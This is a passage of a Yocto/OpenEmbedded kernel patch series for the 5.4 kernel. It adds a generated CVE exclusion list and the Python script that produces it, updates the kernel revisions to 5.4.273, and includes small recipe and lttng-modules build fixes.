+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26678"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26679"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26680"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26681"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26682"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26683"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26684"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26685"
+
+# CVE-2024-26686 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26687 needs backporting (fixed from 6.8rc5)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26688"
+
+# CVE-2024-26689 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26690"
+
+# CVE-2024-26691 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26692"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26693"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26694"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26695"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26696"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26697"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26698"
+
+# CVE-2024-26699 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26700 needs backporting (fixed from 6.8rc4)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26702"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26703"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26704"
+
+# fixed-version: only affects 6.6rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26705"
+
+# CVE-2024-26706 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26707"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26708"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26709"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26710"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26711"
+
+# CVE-2024-26712 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26713 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26714"
+
+# CVE-2024-26715 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26716"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26717"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26718"
+
+# CVE-2024-26719 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26720"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26721"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26722"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26723"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26724"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26725"
+
+# CVE-2024-26726 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26727"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26728"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26729"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26730"
+
+# fixed-version: only affects 6.4rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26731"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26732"
+
+# CVE-2024-26733 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26734"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26735"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26736"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26737"
+
+# CVE-2024-26738 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26739 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26740 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26741"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26742"
+
+# CVE-2024-26743 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26744 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26745 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26746"
+
+# CVE-2024-26747 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26748"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26749"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26750"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26751"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26752"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26753"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26754"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26755"
+
+# CVE-2024-26756 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26757 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26758 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26759 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26760"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26761"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26762"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26763"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26764"
+
+# CVE-2024-26765 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26766"
+
+# CVE-2024-26767 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26768 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26769 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26770 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26771 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26772"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26773"
+
+# CVE-2024-26774 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26775 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26776 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26777"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26778"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26779"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26780"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26781"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26782"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26783"
+
+# CVE-2024-26784 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26785"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26786"
+
+# CVE-2024-26787 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26788"
+
+# CVE-2024-26789 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26790"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26791"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26792"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26793"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26794"
+
+# CVE-2024-26795 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26796"
+
+# CVE-2024-26797 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26798 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26799"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26800"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26801"
+
+# CVE-2024-26802 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26803 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26804"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26805"
+
+# CVE-2024-26806 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26807"
+
+# CVE-2024-26808 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26809 needs backporting (fixed from 6.9rc1)
+
diff --git a/meta/recipes-kernel/linux/generate-cve-exclusions.py b/meta/recipes-kernel/linux/generate-cve-exclusions.py
new file mode 100755
index 0000000000..12ae3b0b1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/generate-cve-exclusions.py
@@ -0,0 +1,101 @@
+#! /usr/bin/env python3
+
+# Generate granular CVE status metadata for a specific version of the kernel
+# using data from linuxkernelcves.com.
+#
+# SPDX-License-Identifier: GPL-2.0-only
+
+import argparse
+import datetime
+import json
+import pathlib
+import re
+
+from packaging.version import Version
+
+
+def parse_version(s):
+ """
+ Parse the version string and either return a packaging.version.Version, or
+ None if the string was unset or "unk".
+ """
+ if s and s != "unk":
+ # packaging.version.Version doesn't approve of versions like v5.12-rc1-dontuse
+ s = s.replace("-dontuse", "")
+ return Version(s)
+ return None
+
+
+def main(argp=None):
+ parser = argparse.ArgumentParser()
+ parser.add_argument("datadir", type=pathlib.Path, help="Path to a clone of https://github.com/nluedtke/linux_kernel_cves")
+ parser.add_argument("version", type=Version, help="Kernel version number to generate data for, such as 6.1.38")
+
+ args = parser.parse_args(argp)
+ datadir = args.datadir
+ version = args.version
+ base_version = f"{version.major}.{version.minor}"
+
+ with open(datadir / "data" / "kernel_cves.json", "r") as f:
+ cve_data = json.load(f)
+
+ with open(datadir / "data" / "stream_fixes.json", "r") as f:
+ stream_data = json.load(f)
+
+ print(f"""
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at {datetime.datetime.now()} for version {version}
+
+python check_kernel_cve_status_version() {{
+ this_version = "{version}"
+ kernel_version = d.getVar("LINUX_VERSION")
+ if kernel_version != this_version:
+ bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+""")
+
+ for cve, data in cve_data.items():
+ if "affected_versions" not in data:
+ print(f"# Skipping {cve}, no affected_versions")
+ print()
+ continue
+
+ affected = data["affected_versions"]
+ first_affected, last_affected = re.search(r"(.+) to (.+)", affected).groups()
+ first_affected = parse_version(first_affected)
+ last_affected = parse_version(last_affected)
+
+ handled = False
+ if not last_affected:
+ print(f"# {cve} has no known resolution")
+ elif first_affected and version < first_affected:
+ print(f"# fixed-version: only affects {first_affected} onwards")
+ handled = True
+ elif last_affected < version:
+ print(f"# fixed-version: Fixed after version {last_affected}")
+ handled = True
+ else:
+ if cve in stream_data:
+ backport_data = stream_data[cve]
+ if base_version in backport_data:
+ backport_ver = Version(backport_data[base_version]["fixed_version"])
+ if backport_ver <= version:
+ print(f"# cpe-stable-backport: Backported in {backport_ver}")
+ handled = True
+ else:
+ # TODO print a note that the kernel needs bumping
+ print(f"# {cve} needs backporting (fixed from {backport_ver})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+
+ if handled:
+ print(f'CVE_CHECK_WHITELIST += "{cve}"')
+
+ print()
+
+
+if __name__ == "__main__":
+ main()
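
The classification comments in the generated cve-exclusion include above follow directly from packaging.version comparisons against the kernel version being built. A minimal sketch of that decision logic is shown below; the kernel version, CVE ranges and backport data are invented for illustration, not entries taken from the linux_kernel_cves data files.

# Minimal sketch of the decision logic in generate-cve-exclusions.py.
# The kernel version, CVE ranges and backport data here are invented
# examples; real input comes from kernel_cves.json and stream_fixes.json.
from packaging.version import Version

kernel = Version("5.4.273")                  # version the include targets
base = f"{kernel.major}.{kernel.minor}"      # stream key, here "5.4"

def classify(first_affected, last_affected, backports):
    # Return the annotation the generator would emit for one CVE.
    first = Version(first_affected) if first_affected else None
    last = Version(last_affected) if last_affected else None
    if last is None:
        return "no known resolution"
    if first and kernel < first:
        return f"fixed-version: only affects {first} onwards"
    if last < kernel:
        return f"fixed-version: Fixed after version {last}"
    fixed = backports.get(base)
    if fixed and Version(fixed) <= kernel:
        return f"cpe-stable-backport: Backported in {fixed}"
    return f"needs backporting (fixed from {last})"

print(classify("6.7rc1", "6.8rc1", {}))                # whitelisted: not yet affected
print(classify("4.19", "6.8rc5", {"5.4": "5.4.270"}))  # whitelisted: stable backport
print(classify("4.19", "6.8rc6", {}))                  # no whitelist entry yet

Pre-release tags such as 6.8rc6 sort before the final 6.8 release under PEP 440 rules, which is why the generator can compare -rc versions from the CVE data directly against stable point releases like 5.4.273.
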
diff --git a/meta/recipes-kernel/linux/kernel-devsrc.bb b/meta/recipes-kernel/linux/kernel-devsrc.bb
index 5940cc90ea..887e1e2430 100644
--- a/meta/recipes-kernel/linux/kernel-devsrc.bb
+++ b/meta/recipes-kernel/linux/kernel-devsrc.bb
@@ -86,6 +86,12 @@ do_install() {
# be dealt with.
# cp -a scripts $kerneldir/build
+ # although module.lds can be regenerated on target via 'make modules_prepare'
+	# there are several places where 'make scripts prepare' is done, and that won't
+ # regenerate the file. So we copy it onto the target as a migration to using
+ # modules_prepare
+ cp -a --parents scripts/module.lds $kerneldir/build/ 2>/dev/null || :
+
if [ -d arch/${ARCH}/scripts ]; then
cp -a arch/${ARCH}/scripts $kerneldir/build/arch/${ARCH}
fi
@@ -171,7 +177,7 @@ do_install() {
cp -a --parents $SYSCALL_TOOLS $kerneldir/build/
fi
- cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/
+ cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 2>/dev/null || :
fi
if [ -d arch/${ARCH}/include ]; then
diff --git a/meta/recipes-kernel/linux/linux-dummy.bb b/meta/recipes-kernel/linux/linux-dummy.bb
index 62cf6f5ea6..c56f8990de 100644
--- a/meta/recipes-kernel/linux/linux-dummy.bb
+++ b/meta/recipes-kernel/linux/linux-dummy.bb
@@ -5,10 +5,12 @@ where you wish to build the kernel externally from the build system."
SECTION = "kernel"
LICENSE = "GPLv2"
-LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
+LIC_FILES_CHKSUM = "file://COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
PROVIDES += "virtual/kernel"
+inherit deploy linux-dummy
+
PACKAGES_DYNAMIC += "^kernel-module-.*"
PACKAGES_DYNAMIC += "^kernel-image-.*"
PACKAGES_DYNAMIC += "^kernel-firmware-.*"
@@ -24,7 +26,7 @@ DESCRIPTION_kernel-vmlinux = "Kernel vmlinux meta package"
INHIBIT_DEFAULT_DEPS = "1"
-#COMPATIBLE_MACHINE = "your_machine"
+COMPATIBLE_HOST = ".*-linux"
PR = "r1"
diff --git a/meta/recipes-kernel/linux/linux-yocto-dev.bb b/meta/recipes-kernel/linux/linux-yocto-dev.bb
index 06a9108fab..a1c0de9981 100644
--- a/meta/recipes-kernel/linux/linux-yocto-dev.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-dev.bb
@@ -10,8 +10,6 @@
inherit kernel
require recipes-kernel/linux/linux-yocto.inc
-# for ncurses tests
-inherit pkgconfig
# provide this .inc to set specific revisions
include recipes-kernel/linux/linux-yocto-dev-revisions.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
index 524e91ebfc..f912304858 100644
--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
@@ -11,13 +11,13 @@ python () {
raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
}
-SRCREV_machine ?= "3a5f7e9a874f0a6e9ad599b4fc6c491db231dd6f"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine ?= "c93e75bc334ba00df2d66411a0d79c4378cf4af8"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
index 00e1b65782..2f94782471 100644
--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
require recipes-kernel/linux/linux-yocto.inc
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
KMETA = "kernel-meta"
KCONF_BSP_AUDIT_LEVEL = "2"
-SRCREV_machine_qemuarm ?= "58f39df46d9daf12a095ffe225032ec325612960"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "d29f3f3a932319053ad24d84b087b0a57908c1bc"
+SRCREV_machine ?= "b6480d09d84d09e7560daa5c1d73917292ae30c0"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
PV = "${LINUX_VERSION}+git${SRCPV}"
diff --git a/meta/recipes-kernel/linux/linux-yocto.inc b/meta/recipes-kernel/linux/linux-yocto.inc
index 91df9c1cd5..2978c2fb90 100644
--- a/meta/recipes-kernel/linux/linux-yocto.inc
+++ b/meta/recipes-kernel/linux/linux-yocto.inc
@@ -1,6 +1,7 @@
SUMMARY = "Linux kernel"
SECTION = "kernel"
LICENSE = "GPLv2"
+HOMEPAGE = "https://www.yoctoproject.org/"
LIC_FILES_CHKSUM ?= "file://COPYING;md5=d7810fab7487fb0aad327b76f1be7cd7"
@@ -55,3 +56,6 @@ do_install_append(){
# enable kernel-sample for oeqa/runtime/cases's ksample.py test
KERNEL_FEATURES_append_qemuall=" features/kernel-sample/kernel-sample.scc"
+
+# CVE exclusion
+include recipes-kernel/linux/cve-exclusion.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
index 2a2ba24cd2..108043bd98 100644
--- a/meta/recipes-kernel/linux/linux-yocto_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
@@ -1,6 +1,7 @@
KBRANCH ?= "v5.4/standard/base"
require recipes-kernel/linux/linux-yocto.inc
+include recipes-kernel/linux/cve-exclusion_5.4.inc
# board specific branches
KBRANCH_qemuarm ?= "v5.4/standard/arm-versatile-926ejs"
@@ -12,16 +13,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base"
KBRANCH_qemux86-64 ?= "v5.4/standard/base"
KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64"
-SRCREV_machine_qemuarm ?= "561d4f6eb1de32e1448451db86656826cf406eb5"
-SRCREV_machine_qemuarm64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips ?= "e421f3f2399c153c4d58241cb6d1be926f7efc45"
-SRCREV_machine_qemuppc ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemuriscv64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86-64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips64 ?= "72d2f11b5f171e196d6b9824b82575d9a7b59e6f"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "b7e0891bf4b281c4e29b86f708e10a3339670acc"
+SRCREV_machine_qemuarm64 ?= "ff75f0c7beb167391f0285dd2993394cd143a8a7"
+SRCREV_machine_qemumips ?= "650e43a19e625d1db9d8245cda27db7b86990398"
+SRCREV_machine_qemuppc ?= "0fb6546a09f90befecb11cd0f10274276e8a3021"
+SRCREV_machine_qemuriscv64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86-64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemumips64 ?= "f59947f338319b1741db5dfac34f08399561ab25"
+SRCREV_machine ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
# remap qemuarm to qemuarma15 for the 5.4 kernel
# KMACHINE_qemuarm ?= "qemuarma15"
@@ -30,7 +31,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
DEPENDS += "openssl-native util-linux-native"
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
new file mode 100644
index 0000000000..3fc7fd733d
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
@@ -0,0 +1,46 @@
+From 25b70c486bb96de0caf7cea1da42ed07801cca84 Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Mon, 4 Apr 2022 14:33:42 -0400
+Subject: [PATCH 17/19] fix: random: remove unused tracepoints (v5.18)
+
+See upstream commit :
+
+ commit 14c174633f349cb41ea90c2c0aaddac157012f74
+ Author: Jason A. Donenfeld <Jason@zx2c4.com>
+ Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [369d82bb1746447514c877088d7c5fd0f39140f8]
+Change-Id: I3b8c3e2732e7efdd76ce63204ac53a48784d0df6
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 3ae2d39e..58da82b8 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -215,8 +215,11 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ CFLAGS_lttng-probe-printk.o += -Wframe-larger-than=2200
+ endif
+
++# Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ $(VERSION) -ge 4 \
++ if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ -a \
++ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
new file mode 100644
index 0000000000..5c324a9bde
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
@@ -0,0 +1,45 @@
+From da956d1444139883f5d01078d945078738ffade4 Mon Sep 17 00:00:00 2001
+From: He Zhe <zhe.he@windriver.com>
+Date: Thu, 2 Jun 2022 06:36:08 +0000
+Subject: [PATCH 18/19] fix: random: remove unused tracepoints (v5.10, v5.15)
+
+The following kernel commit has been back ported to v5.10.119 and v5.15.44.
+
+commit 14c174633f349cb41ea90c2c0aaddac157012f74
+Author: Jason A. Donenfeld <Jason@zx2c4.com>
+Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [1901e0eb58795e850e8fdcb5e1c235e4397b470d]
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
